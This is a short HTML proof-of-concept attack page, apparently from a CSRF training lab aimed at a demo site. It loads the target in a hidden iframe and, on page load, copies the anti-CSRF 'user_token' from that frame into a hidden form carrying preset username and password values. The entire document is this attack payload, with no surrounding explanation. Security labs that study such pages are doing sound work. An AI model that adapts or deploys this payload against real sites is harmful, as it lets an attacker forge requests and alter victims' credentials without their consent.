<iframe src="http://www.csrf_demo.com/csrf_4.php?url=csrf_4.php" id="hack" border="0" style="display:none;">
</iframe>
<body onload="attack()">
<form method="GET" id="transfer" name="transfer" action="http://www.csrf_demo.com/csrf_4.php?url=csrf_4.php">
<input type="hidden" name="username" value="222">
<input type="hidden" name="password" value="222">
<input type="hidden" name="user_token" value="">
<input type="submit" name="submit" value="submit">
</form>
</body>
<script type="text/javascript">
function attack(){
document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
}
</script>
